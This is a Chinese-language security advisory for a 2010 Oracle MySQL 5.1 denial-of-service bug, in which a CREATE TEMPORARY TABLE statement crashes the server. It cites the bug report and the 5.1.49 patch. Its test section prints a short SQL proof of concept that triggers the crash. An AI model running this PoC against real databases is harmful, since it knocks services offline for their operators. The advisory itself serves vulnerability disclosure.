发布日期：2010-08-20
更新日期：2010-08-23

受影响系统：

Oracle MySQL 5.1.48-bzr
Oracle MySQL 5.1.47
Oracle MySQL 5.1.41

不受影响系统：

Oracle MySQL 5.1.49

描述：

---

BUGTRAQ  ID: 42598

MySQL是一款使用非常广泛的开放源代码关系数据库系统，拥有各种平台的运行版本。

如果用户使用CREATE TEMPORARY TABLE命令创建了临时表格并使用了innodb引擎就会导致数据库崩溃。

<*来源：Boris Reisig
  
  链接：http://bugs.mysql.com/bug.php?id=54044
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

mysql> SET storage_engine=MYISAM;

mysql> CREATE TEMPORARY TABLE mk_upgrade AS SELECT  IF(     NULL  IS NOT NULL,      NULL
, NULL) ; drop table mk_upgrade;

建议：

---

厂商补丁：

Oracle
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://dev.mysql.com/doc/refman/5.1/en/news-5-1-49.html

浏览次数：2616
严重程度：0（网友投票）